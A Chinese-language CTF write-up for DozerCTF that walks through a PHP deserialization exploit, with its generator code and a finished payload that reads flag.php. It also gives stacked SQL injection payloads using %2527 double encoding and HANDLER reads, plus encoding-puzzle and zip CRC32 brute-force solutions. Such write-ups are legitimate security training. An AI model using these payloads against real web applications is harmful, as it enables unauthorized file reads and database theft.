DOZERCTF --部分复现

web

白给的反序列化

的确白给
高危函数在这，利用这个函数读取flag.php

这个函数要传两个参数
第一个参数是函数的名字，而我们需要读取flag.php，刚好mysy()函数可以读取任意文件
第二参数要传一个数组，数组里要是参数
所以令第二个参数为flag.php的数组
exp如下

class home
{
    private $method ="mysys";
    private $args = array("flag.php");
	
}
$a = new home();
$b = serialize($a); 
echo $b;
?>

注意他是私有变量

exp生成的payload是不带%00的所以要我们自己加上

payload

O:4:"home":2:{s:12:"%00home%00method";s:5:"mysys";s:10:"%00home%00args";a:1:{i:0;s:8:"flag.php";}}

传入后base64解码即可

sql-lab

提示二次编码 %2527 --+ 闭合 然后
参考 [GYCTF2020]Blacklist
原题改的
堆叠注入完事


有个uziuzi表
看uziuzi表里的内容

1%2527;use security;show columns from `uziuzi`;  --+

然后用handler 来查询flag

1%2527;use security;HANDLER uziuzi OPEN;HANDLER uziuzi READ FIRST;HANDLER uziuzi CLOSE; --+

签到

先base64 再base32

得到16进制的东西

再进行hex转换

再base58解密

MISC upload

流量分析，先搜flag

发现是一段http请求

导出http请求

再点保存全部

可以发现flag那个zip是经过加密的
然后就是zip破解了

这里用到的是crc32破解
爆破工具

将那个5个txt的crc32值按顺序逐个爆破

逐个拼接即可